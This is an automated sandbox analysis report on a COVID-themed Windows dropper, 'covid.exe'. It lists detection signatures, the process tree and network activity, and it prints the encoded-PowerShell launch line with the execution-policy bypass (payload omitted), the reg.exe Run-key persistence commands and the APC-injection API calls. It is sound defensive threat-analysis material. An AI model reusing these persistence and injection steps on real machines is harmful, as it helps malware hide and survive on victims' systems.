Analysis Report covid.exe

Overview

General Information

Sample Name: covid.exe
Analysis ID: 379751
MD5: a990c03d14bef241e880d6167fa5a6aa
SHA1: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • covid.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: A990C03D14BEF241E880D6167FA5A6AA)
    • powershell.exe (PID: 5720 cmdline: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand [Base64-encoded command omitted] MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iexplore.exe (PID: 4168 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 5956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • reg.exe (PID: 6616 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6644 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • buyonegetone.exe (PID: 6748 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
        • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mobsync.exe (PID: 6888 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
          • WerFault.exe (PID: 7016 cmdline: C:\Windows\system32\WerFault.exe -u -p 6888 -s 640 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 7120 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 6224 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 4464 cmdline: C:\Windows\system32\WerFault.exe -u -p 6224 -s 636 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 4244 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5504 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 5108 cmdline: C:\Windows\system32\WerFault.exe -u -p 5504 -s 404 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 5172 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5240 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0x15e:$sa2: -encodedcommand
  • 0x13b:$sc2: -noprofile
  • 0x146:$se3: -executionpolicy bypass
  • 0x136:$sf1: -sta

Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
Rule: JoeSecurity_PowershellLoadEncryptedAssembly
Description: Yara detected Powershell Load Encrypted Assembly
Author: Joe Security

    Memory Dumps

    Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp
    Rule: PowerShell_Susp_Parameter_Combo
    Description: Detects PowerShell invocation with suspicious parameters
    Author: Florian Roth
    Strings:
    • 0x3fa3:$sa2: -encodedcommand
    • 0x3f80:$sc2: -noprofile
    • 0x3f8b:$se3: -executionpolicy bypass
    • 0x3f7b:$sf1: -sta

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Encoded PowerShell Command Line
    Source: Process started, Author: Florian Roth, Markus Neis, Data: Command: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand [Base64-encoded command omitted], CommandLine: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand [Base64-encoded command omitted],

    Signature Overview

    AV Detection:

    Antivirus / Scanner detection for submitted sample
    Source: covid.exe, Avira: detected
    Multi AV Scanner detection for submitted file
    Source: covid.exe, Virustotal: Detection: 15%
    Source: covid.exe, ReversingLabs: Detection: 34%
    Source: 0.0.covid.exe.c70000.0.unpack, Avira: Label: TR/Dropper.Gen2
    Source: covid.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: unknown, HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
    Source: covid.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe, Code function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe, Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe, Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8

    Networking:

    Potential dropper URLs found in powershell memory
    Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
    Source: Joe Sandbox View, IP Address: 23.111.9.35
    Source: Joe Sandbox View, JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
    Source: unknown, DNS traffic detected: queries for: www.who.int
    Source: unknown, Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown, Network traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49734

    E-Banking Fraud:

    Malicious encrypted Powershell command line found
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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

    System Summary:

    Powershell drops PE file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\buyonegetone.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604761C NtQueueApcThread,13_2_00007FF68604761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860473EC NtResumeThread,13_2_00007FF6860473EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047494 NtAllocateVirtualMemory,13_2_00007FF686047494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047478 NtWriteVirtualMemory,13_2_00007FF686047478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10761C NtQueueApcThread,18_2_00007FF6FE10761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1073EC NtResumeThread,18_2_00007FF6FE1073EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory,18_2_00007FF6FE107494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107478 NtWriteVirtualMemory,18_2_00007FF6FE107478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory,29_2_00007FF7E3D67478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory,29_2_00007FF7E3D67494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D673EC NtResumeThread,29_2_00007FF7E3D673EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6761C NtQueueApcThread,29_2_00007FF7E3D6761C
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: covid.exeStatic PE information: invalid certificate
    Source: covid.exeBinary or memory string: OriginalFilename vs covid.exe
    Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: originalfilename vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
    Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs covid.exe
    Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs covid.exe
    Source: covid.exeBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@32/132@14/13
    Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1
    Source: covid.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\covid.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\covid.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: covid.exeVirustotal: Detection: 15%
    Source: covid.exeReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: covid.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: covid.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: covid.exeStatic file information: File size 5253560 > 1048576
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: covid.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4ff600
    Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

    Data Obfuscation:

    Yara detected Powershell Load Encrypted Assembly
    Source: Yara matchFile source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED
    Source: buyonegetone.exe.1.drStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB176DB push ebx; retf 1_2_00007FFAEEB1771A
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860870E8 push rcx; ret 13_2_00007FF6860870E9
    Source: C:\Windows\System32\mobsync.exeCode function: 15_2_0000023A00BA01C9 push esp; iretd 15_2_0000023A00BA01F8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1470E8 push rcx; ret 18_2_00007FF6FE1470E9
    Source: C:\Windows\System32\mobsync.exeCode function: 20_2_0000023F814901EC push esp; iretd 20_2_0000023F814901F8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3DA70E8 push rcx; ret 29_2_00007FF7E3DA70E9

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\buyonegetone.exe
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Users\user\Desktop\covid.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
